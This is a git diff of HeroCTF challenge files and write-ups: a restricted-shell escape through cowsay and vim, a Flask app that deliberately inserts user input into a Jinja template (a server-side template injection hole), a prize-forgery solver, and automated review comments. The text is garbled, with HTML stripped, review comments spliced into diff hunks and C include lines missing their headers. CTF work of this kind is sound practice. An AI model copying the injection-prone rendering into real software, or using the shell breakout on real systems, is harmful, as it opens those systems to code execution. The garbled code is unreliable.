diff --git a/misc/cloud_shell/README.md b/misc/cloud_shell/README.md
new file mode 100644
index 0000000..0b2a16c
--- /dev/null
+++ b/misc/cloud_shell/README.md
@@ -0,0 +1,75 @@
+```
+/ $ echo $PATH
+/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+/ $ ls -l /usr/local/sbin
+ls: /usr/local/sbin: No such file or directory
+/ $ ls -l /usr/local/bin
+ls: /usr/local/bin: No such file or directory
+/ $ ls -l /usr/sbin
+ls: /usr/sbin: No such file or directory
+/ $ ls -l /usr/bin
+ls: /usr/bin: No such file or directory
+/ $ ls -l /sbin
+ls: /sbin: No such file or directory
+/ $ ls -l /bin
+total 4120
+-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 cat
+-rwxr-xr-x 2 root 0 443480 Oct 24 17:14 cloud_cat
+-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_create
+-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_list
+-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_mv
+-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 ls
+-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 sh
+```
+
+```
+/ $ cat /etc/passwd
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+gaoler:x:1000:1000:Linux User,,,:/home/gaoler:/bin/sh
+restricted:x:1001:1001:Linux User,,,:/home/restricted:/bin/jail
+```
+
+```
+ ____ _ _ ____ _ _ _
+ / ___| | ___ _ _ __| | / ___|| |__ ___| | |
+| | | |/ _ \| | | |/ _` | \___ \| '_ \ / _ \ | |
+| |___| | (_) | |_| | (_| | ___) | | | | __/ | |
+ \____|_|\___/ \__,_|\__,_| |____/|_| |_|\___|_|_|
+
+
+Welcome to Cloud Shell !
+
+Here you can interact with your personal vault using our custom binaries :
+- cloud_cat : Get the content of the specified file
+- cloud_list : List your current file(s)
+- cloud_mv : Rename a file
+- cloud_create : Create a file with his content
+
+If you don't know how to use a binary, just execute it without arguments, help will be provided !
+
+/ $ cloud_cat
+Usage: cloud_cat
+/ $ cloud_list
+cloud_socket
+/ $ cloud_mv
+Usage: cloud_mv
+/ $ cloud_create
+Usage: cloud_create
+/ $
+```
diff --git a/misc/free_shell.py b/misc/free_shell/free_shell.py
similarity index 100%
rename from misc/free_shell.py
rename to misc/free_shell/free_shell.py
diff --git a/misc/moo/README.md b/misc/moo/README.md
new file mode 100644
index 0000000..49d1717
--- /dev/null
+++ b/misc/moo/README.md
@@ -0,0 +1,80 @@
+# misc/Moo
+We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag.
+
+```
+ssh -p 11380 dyn05.heroctf.fr
+user@dyn05.heroctf.fr's password:
+Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202
+ ______________________________________________________
+/ Welcome dear CTF player! You can read the flag with: \
+\ /bin/sudo /bin/cat /flag.txt. Or can you?... /
+ ------------------------------------------------------
+ \ ^__^
+ \ (oo)\_______
+ (__)\ )\/\
+ ||----w |
+ || ||
+```
+
+When we try to run the commands, we see we're in a restricted shell:
+```
+user@moo:~$ /bin/sudo /bin/cat /flag.txt
+bash: /bin/sudo: restricted: cannot specify `/' in command names
+```
+
+Let's take a look at our environment a bit with `env`:
+```
+bash: env: command not found
+```
+
+Next thing to do would be look at what our `PATH` is set to:
+```
+user@moo:~$ echo $PATH
+/usr/local/rbin
+```
+
+Attempting to update our `PATH` with `export` fails as well:
+```
+user@moo:~$ PATH=/bin sudo id
+bash: PATH: readonly variable
+bash: sudo: command not found
+```
+
+Well, let's see what is actually available to us in the only `PATH` we have available:
+```
+user@moo:~$ ls -la $PATH
+total 24
+drwxr-xr-x 1 root root 4096 Oct 25 18:18 .
+drwxr-xr-x 1 root root 4096 Oct 25 18:18 ..
+lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay
+lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors
+lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls
+-rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash
+-rwxr-xr-x 1 root root 54 Oct 25 17:35 vim
+```
+
+This reveals a few things:
+- We are in a restricted bashshell
+- We have `cowsay`
+
+So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have
+`vim`.
+
+After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`:
+```
+cowsay -f tmp x
+```
+
+This gives us a full unrestricted shell, and we can now `cat` the flag:
+```
+PATH=/bin
+Hero{s0m3_s4cr3d_c0w}
+```
diff --git a/web/jinjatic/jinjatic.tar.xz b/web/jinjatic/jinjatic.tar.xz
new file mode 100644
index 0000000..087be44
Binary files /dev/null and b/web/jinjatic/jinjatic.tar.xz differ
diff --git a/web/jinjatic/jinjatic/docker-compose.yml b/web/jinjatic/jinjatic/docker-compose.yml
new file mode 100644
index 0000000..b865e04
--- /dev/null
+++ b/web/jinjatic/jinjatic/docker-compose.yml
@@ -0,0 +1,14 @@
+version: '3.8'
+
+services:
+ web:
+ build:
+ context: ./src/
+ ports:
+ - "8000:80"
+ restart: unless-stopped
+ deploy:
+ resources:
+ limits:
+ cpus: "0.5"
+ memory: 1G
diff --git a/web/jinjatic/jinjatic/src/Dockerfile b/web/jinjatic/jinjatic/src/Dockerfile
new file mode 100644
index 0000000..e81eaad
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/Dockerfile
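Review bot: The `web` service gets cpu and memory limits under `deploy.resources.limits` but no bound on process count, and a container that is built to hand out code execution (the app it builds is the challenge) is where that matters most for the host; add `pids_limit: 256` (constructed value) at the service level next to `restart: unless-stopped`. The `version: '3.8'` key is obsolete for current Compose and only produces a warning, so it can be dropped.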
@@ -0,0 +1,26 @@
+FROM alpine:3.17.0
+
+# Init
+RUN apk update && \
+ apk add --no-cache gcc libc-dev python3 py3-pip && \
+# Create user
+ adduser -D -u 1000 challenge && \
+ echo "challenge:$(head -c 32 /dev/urandom | base64)" | chpasswd
+
+#Setup flag
+WORKDIR /root/
+COPY getflag.c .
+RUN gcc getflag.c -o getflag && \
+ chmod u+s getflag && \
+ mv getflag ../ && \
+ rm getflag.c
+COPY flag.txt .
+
+#Setup webapp
+WORKDIR /app/
+COPY ./challenge/ .
+RUN pip3 install -r requirements.txt
+
+USER challenge
+
+CMD ["python3","/app/app.py"]
diff --git a/web/jinjatic/jinjatic/src/challenge/app.py b/web/jinjatic/jinjatic/src/challenge/app.py
new file mode 100644
index 0000000..ec6b731
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/challenge/app.py
@@ -0,0 +1,53 @@
+from flask import Flask, render_template, request
+from pydantic import BaseModel, EmailStr, ValidationError
+from jinja2 import Template
+
+app = Flask(__name__)
+
+email_template = '''
+
+
+
+
+
+ Email Result
+
+
+
+
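Review bot: The compiler installed for the single `gcc getflag.c -o getflag` step (`gcc libc-dev`) stays in the final image, and `RUN pip3 install -r requirements.txt` pulls unpinned packages as root and keeps pip's download cache in the layer; for an image whose web app is meant to be compromised that is avoidable surface and a build that will not reproduce. Build getflag in a separate stage or append `apk del gcc libc-dev` to the RUN that moves it, and use `RUN pip3 install --no-cache-dir -r requirements.txt` with versions pinned in requirements.txt. `apk update` is also redundant once `apk add --no-cache` is used. The app.py hunk that starts on this same line continues below.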
+
+

Welcome on the platform !

+

Your email to connect is: %s

+
+ Generate another welcome email +
+ + + + + +''' + +class EmailModel(BaseModel): + email: EmailStr + +@app.route('/') +def home(): + return render_template('home.html') + +@app.route('/mail') +def mail(): + return render_template('mail.html') + +@app.route('/render', methods=['POST']) +def render_email(): + email = request.form.get('email') + + try: + email_obj = EmailModel(email=email) + return Template(email_template%(email)).render() + except ValidationError as e: + return render_template('mail.html', error="Invalid email format.") + +if __name__ == '__main__': + app.run(host="0.0.0.0", port=80) diff --git a/web/jinjatic/jinjatic/src/challenge/requirements.txt b/web/jinjatic/jinjatic/src/challenge/requirements.txt new file mode 100644 index 0000000..4346070 --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/requirements.txt @@ -0,0 +1,4 @@ +flask +pydantic +pydantic[email] +jinja2 diff --git a/web/jinjatic/jinjatic/src/challenge/templates/home.html b/web/jinjatic/jinjatic/src/challenge/templates/home.html new file mode 100644 index 0000000..279ffff --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/home.html @@ -0,0 +1,21 @@ + + + + + + Home + + + +
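Review bot: `render_email` substitutes the raw form value into the template source with `Template(email_template%(email)).render()`, so whatever passes `EmailStr` becomes part of the Jinja template text rather than data handed to it; the validation limits what an address may look like, it does not make the value inert as template syntax. The commit already ships `templates/result.html`, which renders `{{ email }}` as a context variable through Flask's autoescaping and is never used, so the handler should `return render_template('result.html', email=email_obj.email)` and the module-level `email_template` string can go. `except ValidationError as e:` binds `e` without using it; `except ValidationError:` is enough.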
+
+

We render, you use it

+

Give us emails of your customers to send them a welcome email.

+ Go to Email Page +
+
+ + + + + diff --git a/web/jinjatic/jinjatic/src/challenge/templates/mail.html b/web/jinjatic/jinjatic/src/challenge/templates/mail.html new file mode 100644 index 0000000..693237a --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/mail.html @@ -0,0 +1,35 @@ + + + + + + Mail + + + +
+
+
+

Enter email of your client

+ + {% if error %} + + {% endif %} + +
+
+ + +
+ +
+
+
+
+ + + + + diff --git a/web/jinjatic/jinjatic/src/challenge/templates/result.html b/web/jinjatic/jinjatic/src/challenge/templates/result.html new file mode 100644 index 0000000..0f20315 --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/result.html @@ -0,0 +1,21 @@ + + + + + + Email Result + + + +
+
+

Welcome on the platform !

+

Your email to connect is: {{ email }}

+
+ Generate another welcome email +
+
+
+
+
+
diff --git a/web/jinjatic/jinjatic/src/flag.txt b/web/jinjatic/jinjatic/src/flag.txt
new file mode 100644
index 0000000..508ddf5
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/flag.txt
@@ -0,0 +1 @@
+HERO{FAKE_FLAG}
\ No newline at end of file
diff --git a/web/jinjatic/jinjatic/src/getflag.c b/web/jinjatic/jinjatic/src/getflag.c
new file mode 100644
index 0000000..c96c7eb
--- /dev/null
+++ b/web/jinjatic/jinjatic/src/getflag.c
@@ -0,0 +1,21 @@
+#include
+#include
+
+int main() {
+ const char *file_path = "/root/flag.txt";
+
+ FILE *file = fopen(file_path, "r");
+ if (file == NULL) {
+ perror("Erreur lors de l'ouverture du fichier");
+ return EXIT_FAILURE;
+ }
+
+ char ch;
+ while ((ch = fgetc(file)) != EOF) {
+ putchar(ch);
+ }
+
+ fclose(file);
+
+ return EXIT_SUCCESS;
+}
\ No newline at end of file
diff --git a/web/pryzes/PrYzes/solver.py b/web/pryzes/PrYzes/solver.py
new file mode 100644
index 0000000..4da6a21
--- /dev/null
+++ b/web/pryzes/PrYzes/solver.py
@@ -0,0 +1,22 @@
+import hashlib
+import json
+from datetime import datetime
+
+
+def compute_sha256(data):
+ sha256_hash = hashlib.sha256()
+ sha256_hash.update(data.encode("utf-8"))
+ return sha256_hash.hexdigest()
+
+
+def main():
+ # create datetime object with date 25/10/2121
+ date_obj = datetime.strptime("25/10/2121", "%d/%m/%Y")
+
+ json_data = json.dumps({"date": date_obj.strftime("%d/%m/%Y")})
+ print(compute_sha256(json_data))
+ print(json_data)
+
+
+if __name__ == '__main__':
+ main()
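Review bot: `char ch;` is the wrong type for the `fgetc` result stored on the next line: `fgetc` returns `int` precisely so that `EOF` is distinguishable from every byte value, and narrowing to `char` makes a 0xFF byte compare equal to `EOF` where `char` is signed, or keeps the loop from ever terminating where it is unsigned. Declare it `int ch;`. The two `#include` lines carry no header name in this rendering, presumably an extraction artifact; if that is the committed text the file does not compile. `int main()` should be `int main(void)` for a definition that takes no arguments.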
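Review bot: `compute_sha256` spreads one expression over three statements; `return hashlib.sha256(data.encode("utf-8")).hexdigest()` says the same thing. In `main`, parsing "25/10/2121" with `strptime` and re-formatting it with the same pattern yields the input string back, so `date_obj` only acts as a format check and deserves a comment saying so, e.g. `# round-trip through datetime only to validate the dd/mm/yyyy format`. The digest is taken over `json.dumps` output with its default separators and key order, which presumably has to match the server's serialization byte for byte; a comment stating that dependency would save the next reader a debugging session.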